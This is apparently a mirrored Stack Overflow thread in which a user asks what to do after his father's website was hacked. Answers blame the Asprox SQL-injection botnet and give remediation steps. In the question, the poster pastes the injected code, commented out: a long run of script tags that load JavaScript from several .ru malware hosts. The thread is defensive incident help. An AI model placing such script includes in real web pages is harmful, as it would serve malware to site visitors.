{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://www.manongdao.com/data/attach/logo/logo.png', '推荐 Animai°情兽 的问题《My website got hacked.. What should I do? [closed]》','https://www.manongdao.com/q-1194137.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}
My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.
I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.
So I commented it out for now. It turns out his FTP password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).
I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...
I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?
He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?
So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?
For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
With a six word character password, he may have been brute forced. That is more likely than his ftp being intercepted, but it could be that too.
Start with a stronger password. (8 characters is still fairly weak)
See if this link to an internet security blog is helpful.
I know this is a little late in the game, but the URL mentioned for the JavaScript is mentioned in a list of sites known to have been part of the ASPRox bot resurgence that started up in June (at least that's when we were getting flagged with it). Some details about it are mentioned below:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
The nasty thing about this is that effectively every varchar type field in the database is "infected" to spit out a reference to this URL, in which the browser gets a tiny iframe that turns it into a bot. A basic SQL fix for this can be found here:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
The scary thing though is that the virus looks to the system tables for values to infect and a lot of shared hosting plans also share the database space for their clients. So most likely it wasn't even your dad's site that was infected, but somebody else's site within his hosting cluster that wrote some poor code and opened the door to SQL Injection attack.
If he hasn't done so yet, I'd send an URGENT e-mail to their host and give them a link to that SQL code to fix the entire system. You can fix your own affected database tables, but most likely the bots that are doing the infection are going to pass right through that hole again and infect the whole lot.
Hopefully this gives you some more info to work with.
EDIT: One more quick thought, if he's using one of the hosts online design tools for building his website, all of that content is probably sitting in a column and was infected that way.